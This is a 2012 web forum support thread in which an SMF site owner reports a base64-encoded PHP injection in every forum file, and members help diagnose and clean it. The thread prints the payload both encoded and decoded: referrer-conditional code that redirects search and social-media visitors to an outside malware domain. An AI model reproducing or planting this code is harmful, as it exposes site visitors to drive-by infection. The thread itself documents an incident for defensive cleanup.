News:

Bored?  Looking to kill some time?  Want to chat with other SMF users?  Join us in IRC chat or Discord

Main Menu

All files been infected by virus?

Started by Hj Ahmad Rasyid Hj Ismail, October 12, 2012, 01:08:46 AM

Previous topic - Next topic

Hj Ahmad Rasyid Hj Ismail

All my files in the server/host is infected by something I would like to think this as a virus. I know this could be the server/host problem and have contacted them. Still awaiting their reply on this.

This code was injected to all my SMF files:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZG5zLWRucy5kbnMtZG5zLmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));


What can cause such an injection to all SMF files? How to stop it? Please advise.

Colin

Sorry to hear that. Take a look at just a few:

http://www.simplemachines.org/community/index.php?topic=480455.0
http://www.simplemachines.org/community/index.php?topic=480600.0
http://www.simplemachines.org/community/index.php?topic=469001.0

Here are the docs:
http://wiki.simplemachines.org/smf/How_to_check_permissions
http://wiki.simplemachines.org/smf/How_do_I_make_my_forum_safer_against_hacker_attacks


Here is the code that is being injected:
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://dns-dns.dns-dns.com/");
exit();
}
}
}
}
}
"If everybody is thinking alike, then somebody is not thinking." - Gen. George S. Patton Jr.

Colin

mrintech

Check out following:

* http://sitecheck.sucuri.net/results/ahrasis.com/
* http://labs.sucuri.net/db/malware/malware-entry-mwblacklisted35
* http://blog.sucuri.net/2012/03/conditional-redirect-malware-decoded-evalbase64_decode-example.html

I think you need to clean this type of malware manually. If you have clean backup file, then restore your forum using that.

Also,

1. Change FTP/cPanel/WHM Passwords
2. Check your .htaccess file for malicious codes
2. Scan your PC
3. Open a support ticket with your webhost and ask them whether they can do anything about this. Sometimes, because of weak server security configuration, the attacker gains access and infects many websites.

Hope everything is going to be fine soon :)

mrintech

Quote from: Colin on October 12, 2012, 01:15:45 AM
Here is the code that is being injected:
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://dns-dns.dns-dns.com/");
exit();
}
}
}
}
}


Very Nice


mrintech

The site downloads Trojan program: HEUR:Trojan.Script.Iframer

The malware directly goes to browser cache folder and this way it infects the machine

Hj Ahmad Rasyid Hj Ismail

I will make a more thorough check. Right now, all I know that it has infected or has been injected in almost all files on server/host. My password was rather long and tightly/highly secured. Some claims it is a vulnerability in the software which is only SMF and few mods (not more than 15). This was not there since yesterday. So, there is no possibility any of this mod could have been the cause.

On whether the browser if infected with virus can cause all these, I would say it could be. But the browser I am using is FF15 and Chrome 22.0.1229.94 which is the latest. Could this be caused by firebug with all the available options (including the alpha and beta) installed?

mrintech

Quote from: ahrasis on October 12, 2012, 02:24:57 AM

On whether the browser if infected with virus can cause all these, I would say it could be. But the browser I am using is FF15 and Chrome 22.0.1229.94 which is the latest. Could this be caused by firebug with all the available options (including the alpha and beta) installed?

Have you scanned all your machines using which you do all types of Admin work for your forum?

Try scanning your full PC with Kaspersky and Malware Bytes Anti-malware, with latest definitions. If the malware has blocked security softwares from performing tasks, then you need to use Kaspersky Rescue Disk.

Some properties of above trojan are as follows:

QuoteSlow down your PC speed notably.
Add other dangerous Trojan or Spyware to your system secretly.
Allow the hacker to access your entire system.
Collect all your personal information and transfer to a remote hacker.
Destroy critical system files and make PC unstable.

No matter, how strong your password was, you need to change it

Hj Ahmad Rasyid Hj Ismail

Quote from: mrintech on October 12, 2012, 02:49:56 AM
Have you scanned all your machines using which you do all types of Admin work for your forum?
Am doing it as we speak.
Quote from: mrintech on October 12, 2012, 02:49:56 AM
No matter, how strong your password was, you need to change it
I am changing that too. Will schedule to do that every month from now on.

So far I have clean most of the files on my server/host. Just have to double check to make sure they are all clean. I guess the attack come from one of my Joomla site. Sigh...

mrintech

One very important thing:

Disable your forum unless everything is sorted.

That referral based malware will be downloaded to every computer of your visitor. The malware directly goes to Browser Cache

I also got infected while testing for malware on your website

You need to make your forum Offline

Sorry, but it's necessary!

Hj Ahmad Rasyid Hj Ismail

That's a good idea. But I believe my server/host has restored all the clean files back to their places.

mrintech

Quote from: ahrasis on October 12, 2012, 03:05:43 AM
That's a good idea. But I believe my server/host has restored all the clean files back to their places.



As of now, I am also scanning my PC once again :(

Damn!

Edit:

I use Chrome and the malware was present in this folder: C:\Users\Mrinmay\AppData\Local\Google\Chrome\User Data\Default\

Hj Ahmad Rasyid Hj Ismail

Sorry for that mrintech. As of now I am setting my CloudFlare to "I'm under attack" mode. I hope this will help protecting all my files/sites on my server/host.

mrintech

Quote from: ahrasis on October 12, 2012, 03:18:14 AM
Sorry for that mrintech. As of now I am setting my CloudFlare to "I'm under attack" mode. I hope this will help protecting all my files/sites on my server/host.



No worries, I know how to deal with malwares on my PC. It takes 3-4 Hours to scan my PC as I have lots and lots of files and this annoys me the most.

Hope everything is fine with your websites too :)

Hj Ahmad Rasyid Hj Ismail

#13
They seem fine, for now I was wrong. I'm still facing this problem.  :-[

kat

This is a damned good thread, about this:

http://wordpress.org/support/topic/evalbase64_decode-hacked

I have to admit that, if I was in your place (I was, quite a while back), I might be tempted to replace all of the files with virgin files from the large upgrade archive.

(When I did mine, I went through ever file, manually, removing the code. Defining a macro sped that up, a lot)

But, as you intimated, your Wordpress files could be infected, too.

Hj Ahmad Rasyid Hj Ismail

I only got Joomla & SMF. It is easy for me to deal with SMF. I have various ways of doing it. But I got problem with Joomla. I am planning to separate Joomla into different host/server in the future. One host one software. Easy to find which one is hacked / compromised in the future. Having said that, hmmm... I will wait and see the full report later.

kat

Sorry, I meant Joomla. I was working on two topics and lost my thread, a bit.


Hj Ahmad Rasyid Hj Ismail

Quote from: K@ on October 14, 2012, 03:46:14 PM
Sorry, I meant Joomla. I was working on two topics and lost my thread, a bit.
Ah... It's nothing. I just finished reinstalling all backups. Site should be ok now...

XHIBIT911

yup..I see youve fallen prey to the black hole exploit as well. Thats a nasty virus if Ive ever seen one and it hides in dbase code

mrintech


Advertisement: